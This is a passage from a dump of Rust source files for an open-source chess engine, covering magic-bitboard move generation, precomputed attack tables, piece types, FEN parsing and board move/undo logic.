| config.get_piece_occupancy(BoardPiece::BlackQueen)))
.non_zero()
{
return true;
} else {
return false;
}
}
}
}
fn get_rook_atk(&self, sq: Square, blockers: BitBoard) -> BitBoard {
let magic = self.rook_magics[sq as usize];
// let moves = &self.rook_moves[sq as usize];
self.rook_moves[magic_index(&magic, blockers)]
}
fn get_bishop_atk(&self, sq: Square, blockers: BitBoard) -> BitBoard {
let magic = self.bishop_magics[sq as usize];
// let moves = &self.bishop_moves[sq as usize];
self.bishop_moves[magic_index(&magic, blockers)]
}
fn get_white_pawn_atk(&self, sq: Square) -> BitBoard {
WP_ATK_TBL[sq as usize].into()
}
fn get_black_pawn_atk(&self, sq: Square) -> BitBoard {
BP_ATK_TBL[sq as usize].into()
}
fn get_knight_atk(&self, sq: Square) -> BitBoard {
N_ATK_TBL[sq as usize].into()
}
fn get_king_atk(&self, sq: Square) -> BitBoard {
K_ATK_TBL[sq as usize].into()
}
fn get_rook_moves(&self, sq: Square, blockers: BitBoard, friendly: BitBoard) -> BitBoard {
self.get_rook_atk(sq, blockers) & !friendly
}
fn get_bishop_moves(&self, sq: Square, blockers: BitBoard, friendly: BitBoard) -> BitBoard {
self.get_bishop_atk(sq, blockers) & !friendly
}
fn is_legal(&self, m: Move, c: &mut BoardConfig, side: Color) -> bool {
if let Some(commit) = c.make_move(m) {
let king_sq = match side {
Color::White => c.bitboards[BoardPiece::WhiteKing as usize].peek().unwrap(),
Color::Black => c.bitboards[BoardPiece::BlackKing as usize].peek().unwrap(),
};
let res = !self.is_sq_attacked(king_sq, !side, c);
c.undo_commit(&commit);
return res;
}
false
}
fn make_movelist(
&self,
mut moves: BitBoard,
from: Square,
config: &mut BoardConfig,
list: &mut MoveList,
) {
while *moves > 0 {
let to = moves.pop_sq().unwrap();
let m = Move::infer(from, to, config);
let p = m.p;
if m.is_prom() {
use BoardPiece::*;
match p.get_color() {
Color::White => {
let m = Move::new_prom(from, to, p, m.capture, WhiteRook);
if self.is_legal(m, config, p.get_color()) {
list.push(m);
list.push(Move::new_prom(from, to, p, m.capture, WhiteBishop));
list.push(Move::new_prom(from, to, p, m.capture, WhiteKnight));
list.push(Move::new_prom(from, to, p, m.capture, WhiteQueen));
}
}
Color::Black => {
let m = Move::new_prom(from, to, p, m.capture, BlackRook);
if self.is_legal(m, config, p.get_color()) {
list.push(Move::new_prom(from, to, p, m.capture, BlackBishop));
list.push(Move::new_prom(from, to, p, m.capture, BlackKnight));
list.push(Move::new_prom(from, to, p, m.capture, BlackQueen));
}
}
}
} else {
if let MoveType::Castle(_) = m.move_type {
if self.is_sq_attacked(from, !p.get_color(), config) {
continue;
}
}
if self.is_legal(m, config, p.get_color()) {
list.push(m);
}
}
}
}
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/generator/tables.rs | chrs-lib/src/generator/tables.rs | use crate::data::{BitBoard, BoardPiece, Color};
use crate::prng::*;
pub const NOT_A_FILE: u64 = {
let mut x: u64 = 0;
let mut i = 0;
while i < 64 {
if i % 8 != 0 {
x |= 1 << i;
}
i = i + 1;
}
x
};
pub const NOT_AB_FILE: u64 = {
let mut x: u64 = 0;
let mut i = 0;
while i < 64 {
if i % 8 != 0 && i % 8 != 1 {
x |= 1 << i;
}
i = i + 1;
}
x
};
pub const NOT_H_FILE: u64 = {
let mut x: u64 = 0;
let mut i = 0;
while i < 64 {
if i % 8 != 7 {
x |= 1 << i;
}
i = i + 1;
}
x
};
pub const NOT_GH_FILE: u64 = {
let mut x: u64 = 0;
let mut i = 0;
while i < 64 {
if i % 8 != 7 && i % 8 != 6 {
x |= 1 << i;
}
i = i + 1;
}
x
};
pub const WP_ATK_TBL: [u64; 64] = {
let mut i = 0;
let mut table: [u64; 64] = [0; 64];
while i < 64 {
table[i] = generate_pawn_attack(Color::White, i);
i += 1;
}
table
};
pub const BP_ATK_TBL: [u64; 64] = {
let mut i = 0;
let mut table: [u64; 64] = [0; 64];
while i < 64 {
table[i] = generate_pawn_attack(Color::Black, i);
i += 1;
}
table
};
pub const N_ATK_TBL: [u64; 64] = {
let mut i = 0;
let mut table: [u64; 64] = [0; 64];
while i < 64 {
table[i] = generate_knight_attack(i);
i += 1;
}
table
};
pub const K_ATK_TBL: [u64; 64] = {
let mut i = 0;
let mut table: [u64; 64] = [0; 64];
while i < 64 {
table[i] = generate_king_attack(i);
i += 1;
}
table
};
const fn generate_pawn_attack(side: Color, sq: usize) -> u64 {
let b = 1 << sq;
match side {
Color::White => ((b << 7) & NOT_H_FILE) | ((b << 9) & NOT_A_FILE),
Color::Black => ((b >> 7) & NOT_A_FILE) | ((b >> 9) & NOT_H_FILE),
}
}
const fn generate_knight_attack(sq: usize) -> u64 {
let mut b = 1 << sq;
// << up, >> down
b = (b << 6) | (b << 15) | (b << 10) | (b << 17) | (b >> 6) | (b >> 15) | (b >> 10) | (b >> 17);
if sq % 8 == 0 || sq % 8 == 1 {
b &= NOT_GH_FILE;
}
if sq % 8 == 7 || sq % 8 == 6 {
b &= NOT_AB_FILE;
}
b
}
const fn generate_king_attack(sq: usize) -> u64 {
let mut b = 1 << sq;
// << up, >> down
b = (b << 8) | (b >> 8) | (b >> 1) | (b << 1) | (b >> 9) | (b << 9) | (b >> 7) | (b << 7);
if sq % 8 == 0 {
b &= NOT_H_FILE;
}
if sq % 8 == 7 {
b &= NOT_A_FILE;
}
b
}
#[derive(Debug, Default, Clone, Copy)]
pub struct MagicEntry {
pub relevant_occupancy: u64,
pub magic: u64,
pub index_bits: u8,
pub offset: usize,
}
pub struct TableFillError;
pub fn magic_index(entry: &MagicEntry, blockers: BitBoard) -> usize {
let relevant_blockers = *blockers & entry.relevant_occupancy;
let hash = relevant_blockers.wrapping_mul(entry.magic);
let index = (hash >> (64 - entry.index_bits)) as usize + entry.offset;
index
}
fn try_make_table(
sq: usize,
slider: BoardPiece,
magic: &MagicEntry,
) -> Result<Vec<BitBoard>, TableFillError> {
let mut table = vec![BitBoard::default(); 1 << magic.index_bits];
let mut subset: u64 = 0;
loop {
let table_entry = &mut table[magic_index(magic, subset.into())];
let moves = match slider {
BoardPiece::WhiteRook | BoardPiece::BlackRook => generate_rook_attack(sq, subset),
BoardPiece::WhiteBishop | BoardPiece::BlackBishop => generate_bishop_attack(sq, subset),
_ => panic!("{:?} is not a sliding Piece", slider),
};
if *table_entry == 0 {
*table_entry = moves.into();
} else if *table_entry != moves {
return Err(TableFillError);
}
subset = subset.wrapping_sub(magic.relevant_occupancy) & magic.relevant_occupancy;
if subset == 0 {
break;
}
}
Ok(table)
}
pub fn find_magic(sq: usize, slider: BoardPiece) -> (MagicEntry, Vec<BitBoard>) {
let relevant_occupancy = match slider {
BoardPiece::WhiteRook | BoardPiece::BlackRook => rook_relevant_occupancy(sq),
BoardPiece::WhiteBishop | BoardPiece::BlackBishop => bishop_relevant_occupancy(sq),
_ => panic!("{:?} is not a sliding Piece", slider),
};
loop {
let magic = random_u64() & random_u64() & random_u64();
let index_bits = relevant_occupancy.count_ones() as u8;
let magic_entry = MagicEntry {
relevant_occupancy,
magic,
index_bits,
offset: 0,
};
if let Ok(table) = try_make_table(sq, slider, &magic_entry) {
return (magic_entry, table);
}
}
}
const fn bishop_relevant_occupancy(sq: usize) -> u64 {
let sq = sq as i8;
let mut b = 0;
let mut r = sq / 8 + 1;
let mut f = sq % 8 + 1;
while r <= 6 && f <= 6 {
b |= 1 << (r * 8 + f);
r += 1;
f += 1;
}
let mut r = sq / 8 + 1;
let mut f = sq % 8 - 1;
while r <= 6 && f > 0 {
b |= 1 << (r * 8 + f);
r += 1;
f -= 1;
}
let mut r = sq / 8 - 1;
let mut f = sq % 8 + 1;
while r > 0 && f <= 6 {
b |= 1 << (r * 8 + f);
r -= 1;
f += 1;
}
let mut r = sq / 8 - 1;
let mut f = sq % 8 - 1;
while r > 0 && f > 0 {
b |= 1 << (r * 8 + f);
r -= 1;
f -= 1;
}
b
}
const fn rook_relevant_occupancy(sq: usize) -> u64 {
let sq = sq as i8;
let mut b = 0;
let mut r = sq / 8 + 1;
let f = sq % 8;
while r <= 6 {
b |= 1 << (r * 8 + f);
r += 1;
}
let mut r = sq / 8 - 1;
let f = sq % 8;
while r > 0 {
b |= 1 << (r * 8 + f);
r -= 1;
}
let r = sq / 8;
let mut f = sq % 8 + 1;
while f <= 6 {
b |= 1 << (r * 8 + f);
f += 1;
}
let r = sq / 8;
let mut f = sq % 8 - 1;
while f > 0 {
b |= 1 << (r * 8 + f);
f -= 1;
}
b
}
const fn generate_bishop_attack(sq: usize, block: u64) -> u64 {
let sq = sq as i8;
let mut b = 0;
let mut r = sq / 8 + 1;
let mut f = sq % 8 + 1;
while r <= 7 && f <= 7 {
b |= 1 << (r * 8 + f);
if block & (1 << (r * 8 + f)) > 0 {
break;
}
r += 1;
f += 1;
}
let mut r = sq / 8 + 1;
let mut f = sq % 8 - 1;
while r <= 7 && f >= 0 {
b |= 1 << (r * 8 + f);
if block & (1 << (r * 8 + f)) > 0 {
break;
}
r += 1;
f -= 1;
}
let mut r = sq / 8 - 1;
let mut f = sq % 8 + 1;
while r >= 0 && f <= 7 {
b |= 1 << (r * 8 + f);
if block & (1 << (r * 8 + f)) > 0 {
break;
}
r -= 1;
f += 1;
}
let mut r = sq / 8 - 1;
let mut f = sq % 8 - 1;
while r >= 0 && f >= 0 {
b |= 1 << (r * 8 + f);
if block & (1 << (r * 8 + f)) > 0 {
break;
}
r -= 1;
f -= 1;
}
b
}
const fn generate_rook_attack(sq: usize, block: u64) -> u64 {
let sq = sq as i8;
let mut b = 0;
let mut r = sq / 8 + 1;
let f = sq % 8;
while r <= 7 {
b |= 1 << (r * 8 + f);
if block & (1 << (r * 8 + f)) > 0 {
break;
}
r += 1;
}
let mut r = sq / 8 - 1;
let f = sq % 8;
while r >= 0 {
b |= 1 << (r * 8 + f);
if block & (1 << (r * 8 + f)) > 0 {
break;
}
r -= 1;
}
let r = sq / 8;
let mut f = sq % 8 + 1;
while f <= 7 {
b |= 1 << (r * 8 + f);
if block & (1 << (r * 8 + f)) > 0 {
break;
}
f += 1;
}
let r = sq / 8;
let mut f = sq % 8 - 1;
while f >= 0 {
b |= 1 << (r * 8 + f);
if block & (1 << (r * 8 + f)) > 0 {
break;
}
f -= 1;
}
b
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/data/piece.rs | chrs-lib/src/data/piece.rs | use std::ops::Not;
use strum_macros::{Display, EnumIter, EnumString};
#[derive(Debug, Clone, Copy, Eq, PartialEq, Hash, Display)]
pub enum Color {
White,
Black,
}
impl Not for Color {
type Output = Self;
fn not(self) -> Self {
use Color::*;
match self {
White => Black,
Black => White,
}
}
}
#[derive(Debug, Clone, Copy, Eq, PartialEq, Hash, Display, EnumString, EnumIter)]
pub enum BoardPiece {
#[strum(serialize = "P")]
WhitePawn,
#[strum(serialize = "N")]
WhiteKnight,
#[strum(serialize = "B")]
WhiteBishop,
#[strum(serialize = "R")]
WhiteRook,
#[strum(serialize = "Q")]
WhiteQueen,
#[strum(serialize = "K")]
WhiteKing,
#[strum(serialize = "p")]
BlackPawn,
#[strum(serialize = "n")]
BlackKnight,
#[strum(serialize = "b")]
BlackBishop,
#[strum(serialize = "r")]
BlackRook,
#[strum(serialize = "q")]
BlackQueen,
#[strum(serialize = "k")]
BlackKing,
}
impl BoardPiece {
pub fn get_color(&self) -> Color {
use BoardPiece::*;
match self {
WhiteKing | WhiteRook | WhiteBishop | WhiteQueen | WhiteKnight | WhitePawn => {
Color::White
}
BlackKing | BlackRook | BlackBishop | BlackQueen | BlackKnight | BlackPawn => {
Color::Black
}
}
}
pub fn utf_str(&self) -> &'static str {
use BoardPiece::*;
match self {
WhitePawn => "♙",
WhiteKnight => "♘",
WhiteBishop => "♗",
WhiteRook => "♖",
WhiteQueen => "♕",
WhiteKing => "♔",
BlackPawn => "♟",
BlackKnight => "♞",
BlackBishop => "♝",
BlackRook => "♜",
BlackQueen => "♛",
BlackKing => "♚",
}
}
}
pub const W_PIECES: [BoardPiece; 6] = {
use BoardPiece::*;
[
WhiteKing,
WhitePawn,
WhiteRook,
WhiteQueen,
WhiteBishop,
WhiteKnight,
]
};
pub const B_PIECES: [BoardPiece; 6] = {
use BoardPiece::*;
[
BlackKing,
BlackPawn,
BlackRook,
BlackQueen,
BlackBishop,
BlackKnight,
]
};
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/data/fen.rs | chrs-lib/src/data/fen.rs | use std::str::FromStr;
use crate::data::{BoardMap, CastleFlags, GameState};
use crate::zobrist::hash;
use super::piece::{BoardPiece, Color};
use super::square::Square;
use super::BoardConfig;
pub struct Fen;
impl Fen {
pub fn make_config_from_str(s: &str) -> BoardConfig {
Fen::make_config(s)
}
pub fn make_fen_from_config(c: &BoardConfig) -> String {
let mut s = String::new();
for y in (0..8).rev() {
let mut empty = 0;
for x in 0..8 {
if let Some(p) = c.get_at_sq((x, y).try_into().unwrap()) {
if empty > 0 {
s.push_str(&empty.to_string());
empty = 0;
}
s.push_str(&p.to_string());
} else {
empty = empty + 1;
}
}
if empty > 0 {
s.push_str(&empty.to_string());
}
if y > 0 {
s.push('/');
}
}
match c.get_active_color() {
Color::White => s.push_str(" w "),
Color::Black => s.push_str(" b "),
}
if c.get_can_white_castle_kingside() {
s.push('K');
}
if c.get_can_white_castle_queenside() {
s.push('Q');
}
if c.get_can_black_castle_kingside() {
s.push('k');
}
if c.get_can_black_castle_queenside() {
s.push('q');
}
s.push(' ');
if let Some(pos) = c.get_en_passant_target() {
s.push_str(&pos.to_string().to_lowercase());
} else {
s.push('-');
}
s.push(' ');
s.push_str(&c.get_halfmove_clock().to_string());
s.push(' ');
s.push_str(&c.get_fullmove_number().to_string());
s
}
fn get_piece_from_c(c: char) -> BoardPiece {
if let Ok(p) = BoardPiece::from_str(&c.to_string()) {
p
} else {
log::error!("Fen Error: {} is invalid piece", c);
panic!();
}
}
fn get_sq_from_code(s: &str) -> Square {
let a = 'a'.to_ascii_lowercase() as usize;
let mut it = s.chars();
let c = it.next().unwrap();
let x = if c.is_alphabetic() {
c.to_ascii_lowercase() as usize - a
} else {
log::error!("Fen Error: {} is invalid square", s);
panic!();
};
let n: String = it.collect();
let y = n.parse::<usize>().unwrap() - 1;
log::debug!("decode {} to {:?}", s, (x, y));
(x, y).try_into().unwrap()
}
// TODO: Return Result with custom error type
fn make_config(fen_str: &str) -> BoardConfig {
log::trace!("Making BoardConfig...");
let mut castle_flags = CastleFlags::default();
let mut en_passant_target: Option<Square> = None;
let mut halfmove_clock = 0;
let mut fullmove_number = 0;
let mut active_color = Color::White;
let mut bitboards: BoardMap = Default::default();
for (i, data) in fen_str.split_whitespace().enumerate() {
log::trace!("Parcing Fen field {}, {}", i, data);
match i {
0 => {
for (i, rank) in data.split('/').enumerate() {
let mut x = 0;
for c in rank.chars() {
if c.is_digit(10) {
x = x + c.to_digit(10).unwrap();
} else {
log::debug!("Place {c} at {:?}", (7 - i, x));
bitboards[Fen::get_piece_from_c(c) as usize]
.set(Square::try_from((x as usize, 7 - i)).unwrap());
x = x + 1;
}
}
}
}
1 => {
if data.len() > 1 {
log::error!("Fen Error: Active color field is wrong");
} else {
if let Some(c) = data.chars().next() {
match c {
'w' => {
active_color = Color::White;
}
'b' => {
active_color = Color::Black;
}
_ => {
log::error!("Fen Error: {} is invalid color", c);
panic!();
}
}
}
}
}
2 => {
if data.len() == 1 && data.chars().next() == Some('-') {
} else {
let mut chars = data.chars();
while let Some(c) = chars.next() {
match c {
'k' => castle_flags.set_black_oo(),
'q' => castle_flags.set_black_ooo(),
'K' => castle_flags.set_white_oo(),
'Q' => castle_flags.set_white_ooo(),
_ => {
log::error!("Fen Error: {} is invalid", c);
panic!();
}
}
}
}
}
3 => {
if data.len() == 1 && data.chars().next() == Some('-') {
} else {
en_passant_target = Some(Self::get_sq_from_code(data));
}
}
4 => {
if let Ok(n) = data.parse::<u8>() {
halfmove_clock = n;
} else {
log::error!("Fen Error: {} is invalid halfmove", data);
panic!();
}
}
5 => {
if let Ok(n) = data.parse::<u8>() {
fullmove_number = n;
} else {
log::error!("Fen Error: {} is invalid fullmove", data);
panic!();
}
}
_ => {
log::error!("Fen Error: Extra Fields");
panic!();
}
};
}
log::trace!("Done..");
let mut c = BoardConfig {
active_color,
en_passant_target,
castle_flags,
halfmove_clock,
fullmove_number,
bitboards,
move_history: Default::default(),
state: GameState::InPlay,
hash: 0,
};
c.hash = hash(&c);
c
}
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/data/bitboard.rs | chrs-lib/src/data/bitboard.rs | use super::square::Square;
use std::cmp::PartialEq;
use std::fmt::Display;
use std::ops::{BitAnd, BitAndAssign, BitOr, BitOrAssign, Deref, DerefMut, Not, Shl, Shr};
#[derive(Debug, Clone, Copy, Default, PartialOrd, Ord, Eq, PartialEq)]
pub struct BitBoard(u64);
impl Deref for BitBoard {
type Target = u64;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for BitBoard {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl BitBoard {
pub fn set(&mut self, sq: Square) {
self.0 |= (1 as u64) << sq as usize;
}
pub fn unset(&mut self, sq: Square) {
self.0 &= !((1 as u64) << sq as usize);
}
pub fn is_set(&self, sq: Square) -> bool {
self.0 & ((1 as u64) << sq as usize) > 0
}
pub fn make_move(&mut self, prev: Square, new: Square) {
self.unset(prev);
self.set(new);
}
pub fn pop_sq(&mut self) -> Option<Square> {
let tzs = self.0.trailing_zeros();
if tzs >= 64 {
None
} else {
// let sq: Square = (tzs as usize).try_into().unwrap();
// this should be faster than try_into().unwrap()
let sq: Square = unsafe { std::mem::transmute(tzs as u8) };
// self.unset(sq);
self.0 &= !(1 << tzs);
Some(sq)
}
}
pub fn non_zero(&self) -> bool {
self.0 > 0
}
pub fn peek(&self) -> Option<Square> {
let tzs = self.0.trailing_zeros();
if tzs >= 64 {
None
} else {
// let sq: Square = (tzs as usize).try_into().unwrap();
// this should be faster than try_into().unwrap()
let sq: Square = unsafe { std::mem::transmute(tzs as u8) };
Some(sq)
}
}
}
impl PartialEq<u64> for BitBoard {
fn eq(&self, other: &u64) -> bool {
self.0 == *other
}
}
impl From<BitBoard> for u64 {
fn from(value: BitBoard) -> Self {
value.0
}
}
impl From<u64> for BitBoard {
fn from(value: u64) -> Self {
Self(value)
}
}
impl Display for BitBoard {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut b = (0..8)
.rev()
.map(|x| {
format!(
"{:08b} {}",
((self.0 & (0xff << x * 8)) >> x * 8) as u8,
x + 1
)
})
.map(|s| s.chars().rev().collect::<String>())
.collect::<Vec<String>>()
.join("\n");
b.push_str("\n abcdefgh");
b = b.replace("0", ".");
write!(f, "{}", b)
}
}
impl BitOr for BitBoard {
type Output = Self;
fn bitor(self, rhs: Self) -> Self::Output {
Self(self.0 | rhs.0)
}
}
impl BitOrAssign for BitBoard {
fn bitor_assign(&mut self, rhs: Self) {
*self = Self(self.0 | rhs.0)
}
}
impl BitAnd for BitBoard {
type Output = Self;
fn bitand(self, rhs: Self) -> Self::Output {
Self(self.0 & rhs.0)
}
}
impl BitAndAssign for BitBoard {
fn bitand_assign(&mut self, rhs: Self) {
*self = Self(self.0 & rhs.0)
}
}
impl Shr<BitBoard> for BitBoard {
type Output = Self;
fn shr(self, Self(rhs): Self) -> Self::Output {
let Self(lhs) = self;
Self(lhs >> rhs)
}
}
impl Shl<BitBoard> for BitBoard {
type Output = Self;
fn shl(self, Self(rhs): Self) -> Self::Output {
let Self(lhs) = self;
Self(lhs << rhs)
}
}
impl Not for BitBoard {
type Output = Self;
fn not(self) -> Self::Output {
Self(!self.0)
}
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/data/mod.rs | chrs-lib/src/data/mod.rs | pub mod bitboard;
mod fen;
mod moves;
pub mod piece;
mod square;
use crate::zobrist::{hash, update_castle, update_ep, update_side};
use crate::{generator::MoveGenerator, zobrist::update_piece};
use fen::Fen;
use moves::CastleType;
use std::str::FromStr;
use strum::IntoEnumIterator;
pub use bitboard::BitBoard;
pub use moves::{List, Move, MoveCommit, MoveList, MoveType};
pub use piece::{BoardPiece, Color, B_PIECES, W_PIECES};
pub use square::Square;
pub type BoardMap = [BitBoard; 12];
#[derive(Clone, Copy, Debug, Eq, PartialEq)]
pub enum GameState {
InPlay,
Mate(Color),
StaleMate,
}
#[derive(Debug, Clone)]
pub struct BoardConfig {
active_color: Color,
en_passant_target: Option<Square>,
castle_flags: CastleFlags,
halfmove_clock: u8,
fullmove_number: u8,
pub bitboards: BoardMap,
pub move_history: Box<List<MoveCommit>>,
pub state: GameState,
hash: u64,
}
impl Default for BoardConfig {
fn default() -> Self {
Fen::make_config_from_str("rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1")
}
}
impl BoardConfig {
pub fn get_hash(&self) -> u64 {
self.hash
}
pub fn print_board(&self) {
println!("{}", self.to_string());
}
pub fn set_mate(&mut self, c: Color) {
self.state = GameState::Mate(c);
}
pub fn set_stalemate(&mut self) {
self.state = GameState::StaleMate;
}
pub fn get_state(&self) -> GameState {
self.state
}
fn set_ep_target(&mut self, t: Square) {
if let Some(t) = self.en_passant_target {
update_ep(t, &mut self.hash)
}
self.en_passant_target = Some(t);
update_ep(t, &mut self.hash)
}
fn clear_ep_target(&mut self) {
if let Some(t) = self.en_passant_target {
update_ep(t, &mut self.hash)
}
self.en_passant_target = None;
}
pub fn to_string(&self) -> String {
let mut s = String::new();
for y in (0..8).rev() {
s = format!("{}{}", s, y + 1);
for x in 0..8 {
let sq = Square::try_from((x, y)).unwrap();
if let Some(p) = self.get_at_sq(sq) {
s = format!("{} {}", s, p.utf_str());
} else {
s = format!("{} .", s);
}
}
s = format!("{}\n", s);
}
s = format!("{} a b c d e f g h", s);
s = format!("{}\nHash: {:x}", s, hash(self));
s = format!("{}\nFEN: {}", s, self.get_fen());
s
}
pub fn get_last_commit(&self) -> Option<MoveCommit> {
self.move_history.get_last()
}
pub fn apply_move(&mut self, m: Move) {
if let Some(commit) = self.make_move(m) {
log::info!("{:?}", commit);
self.move_history.push(commit);
}
}
pub fn is_king_in_check(&self, gen: &MoveGenerator, side: Color) -> bool {
let sq = match side {
Color::White => self.bitboards[BoardPiece::WhiteKing as usize].peek(),
Color::Black => self.bitboards[BoardPiece::BlackKing as usize].peek(),
};
if let Some(sq) = sq {
return gen.is_sq_attacked(sq, !side, &self);
}
false
}
pub fn make_move(&mut self, m: Move) -> Option<MoveCommit> {
// prevent from moving when its not their turn
if m.p.get_color() != self.active_color {
return None;
}
let prev_ep_target = self.en_passant_target;
let prev_castle_flags = self.castle_flags;
use MoveType::*;
match m.move_type {
Normal => self.make_normal(&m),
DoublePush => self.make_double_push(&m),
EnPassant => self.make_en_passant(&m),
Castle(castle_type) => self.make_castle(&m, castle_type),
Promotion(prom) => {
if let Some(prom) = prom {
self.make_promotion(&m, prom)
} else {
log::error!("Promotion Move has no promotion piece assigned to it");
panic!();
}
}
};
// en passant state update
if m.move_type != DoublePush {
self.clear_ep_target();
}
// castling state update
if m.from == Square::A1 || m.to == Square::A1 {
self.castle_flags.unset_white_ooo();
} else if m.from == Square::A8 || m.to == Square::A8 {
self.castle_flags.unset_black_ooo();
} else if m.from == Square::H1 || m.to == Square::H1 {
self.castle_flags.unset_white_oo();
} else if m.from == Square::H8 || m.to == Square::H8 {
self.castle_flags.unset_black_oo();
}
if m.from == Square::E1 || m.to == Square::E1 {
self.castle_flags.unset_white_oo();
self.castle_flags.unset_white_ooo();
} else if m.from == Square::E8 || m.to == Square::E8 {
self.castle_flags.unset_black_oo();
self.castle_flags.unset_black_ooo();
}
let castledelta = self.castle_flags.0 ^ prev_castle_flags.0;
if self.active_color == Color::Black {
self.fullmove_number += 1;
}
update_castle(prev_castle_flags.raw(), &mut self.hash);
update_castle(self.castle_flags.raw(), &mut self.hash);
self.halfmove_clock += 1;
self.toggle_active_color();
Some(MoveCommit::new(m, prev_ep_target, CastleFlags(castledelta)))
}
fn make_normal(&mut self, m: &Move) {
if let Some(cap) = m.capture {
self.remove_piece(cap, m.to);
}
self.move_piece(m.p, m.from, m.to);
}
fn make_double_push(&mut self, m: &Move) {
self.move_piece(m.p, m.from, m.to);
if m.p.get_color() == Color::White {
// self.set_ep_target(Square::try_from(m.to as usize - 8).unwrap());
self.set_ep_target(unsafe { std::mem::transmute::<u8, Square>(m.to as u8 - 8) });
} else {
// self.set_ep_target(Square::try_from(m.to as usize + 8).unwrap());
self.set_ep_target(unsafe { std::mem::transmute::<u8, Square>(m.to as u8 + 8) });
}
}
fn make_en_passant(&mut self, m: &Move) {
self.move_piece(m.p, m.from, m.to);
if m.p.get_color() == Color::White {
self.remove_piece(
m.capture.unwrap(),
unsafe { std::mem::transmute::<u8, Square>(m.to as u8 - 8) }, // Square::try_from(m.to as usize - 8).unwrap(),
)
} else {
self.remove_piece(
m.capture.unwrap(),
unsafe { std::mem::transmute::<u8, Square>(m.to as u8 + 8) }, // Square::try_from(m.to as usize + 8).unwrap(),
)
}
}
fn make_castle(&mut self, m: &Move, castle_type: CastleType) {
let pcolor = m.p.get_color();
match castle_type {
CastleType::KingSide => {
if pcolor == Color::White {
self.move_piece(BoardPiece::WhiteKing, Square::E1, Square::G1);
self.move_piece(BoardPiece::WhiteRook, Square::H1, Square::F1);
}
if pcolor == Color::Black {
self.move_piece(BoardPiece::BlackKing, Square::E8, Square::G8);
self.move_piece(BoardPiece::BlackRook, Square::H8, Square::F8);
}
}
CastleType::QueenSide => {
if pcolor == Color::White {
self.move_piece(BoardPiece::WhiteKing, Square::E1, Square::C1);
self.move_piece(BoardPiece::WhiteRook, Square::A1, Square::D1);
}
if pcolor == Color::Black {
self.move_piece(BoardPiece::BlackKing, Square::E8, Square::C8);
self.move_piece(BoardPiece::BlackRook, Square::A8, Square::D8);
}
}
}
match pcolor {
Color::White => {
self.castle_flags.unset_white_oo();
self.castle_flags.unset_white_ooo();
}
Color::Black => {
self.castle_flags.unset_black_oo();
self.castle_flags.unset_black_ooo();
}
}
}
fn make_promotion(&mut self, m: &Move, prom: BoardPiece) {
if let Some(cap) = m.capture {
self.remove_piece(cap, m.to);
}
self.remove_piece(m.p, m.from);
self.add_piece(prom, m.to);
}
pub fn undo(&mut self) {
if let Some(commit) = self.move_history.pop() {
self.undo_commit(&commit);
}
self.state = GameState::InPlay;
}
pub fn undo_commit(&mut self, commit: &MoveCommit) {
let pcolor = commit.m.p.get_color();
use MoveType::*;
match commit.m.move_type {
Normal => self.undo_normal(&commit),
DoublePush => self.undo_double_push(&commit),
EnPassant => self.undo_en_passant(&commit),
Castle(castle_type) => self.undo_castle(&commit, castle_type),
Promotion(prom) => {
if let Some(prom) = prom {
self.undo_promotion(&commit, prom);
} else {
log::error!("Promotion Move has no promotion piece assigned to it");
panic!();
}
}
}
if pcolor == Color::Black {
self.fullmove_number -= 1;
}
if let Some(t) = commit.ep_target {
self.set_ep_target(t);
} else {
self.clear_ep_target();
}
let oldcastleflags = self.castle_flags.0 ^ commit.castledelta.0;
update_castle(self.castle_flags.raw(), &mut self.hash);
update_castle(oldcastleflags, &mut self.hash);
self.castle_flags = CastleFlags(oldcastleflags);
self.halfmove_clock -= 1;
self.toggle_active_color();
}
fn undo_normal(&mut self, commit: &MoveCommit) {
self.move_piece(commit.m.p, commit.m.to, commit.m.from);
if let Some(cap) = commit.m.capture {
self.add_piece(cap, commit.m.to);
}
}
fn undo_double_push(&mut self, commit: &MoveCommit) {
self.move_piece(commit.m.p, commit.m.to, commit.m.from);
}
fn undo_castle(&mut self, commit: &MoveCommit, castle_type: CastleType) {
match commit.m.p.get_color() {
Color::White => match castle_type {
CastleType::KingSide => {
self.move_piece(BoardPiece::WhiteKing, Square::G1, Square::E1);
self.move_piece(BoardPiece::WhiteRook, Square::F1, Square::H1);
}
CastleType::QueenSide => {
self.move_piece(BoardPiece::WhiteKing, Square::C1, Square::E1);
self.move_piece(BoardPiece::WhiteRook, Square::D1, Square::A1);
}
},
Color::Black => match castle_type {
CastleType::KingSide => {
self.move_piece(BoardPiece::BlackKing, Square::G8, Square::E8);
self.move_piece(BoardPiece::BlackRook, Square::F8, Square::H8);
}
CastleType::QueenSide => {
self.move_piece(BoardPiece::BlackKing, Square::C8, Square::E8);
self.move_piece(BoardPiece::BlackRook, Square::D8, Square::A8);
}
},
}
}
fn undo_promotion(&mut self, commit: &MoveCommit, prom: BoardPiece) {
self.remove_piece(prom, commit.m.to);
match commit.m.p.get_color() {
Color::White => self.add_piece(BoardPiece::WhitePawn, commit.m.from),
Color::Black => self.add_piece(BoardPiece::BlackPawn, commit.m.from),
}
if let Some(cap) = commit.m.capture {
self.add_piece(cap, commit.m.to);
